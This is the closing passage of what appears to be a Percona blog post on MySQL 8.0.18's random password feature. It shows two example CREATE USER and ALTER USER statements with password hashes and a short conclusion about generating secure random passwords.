CREATE USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*5978ACEA46C1B81C7BEE2D1470ED1B002FE6840B'
ALTER USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*2994ECB14E21A8333C8C2DEDF38311EB714D500C'

In Closing

Human imagination is often a limiting factor in choosing secure passwords. The random password capability introduced in MySQL 8.0.18 ensures that there is a standardized method for truly random and secure passwords in your database environment.

Complete the 2021 Percona Open Source Data Management Software Survey

Have Your Say!

Powered by WordPress | Theme: Aeros 2.0 by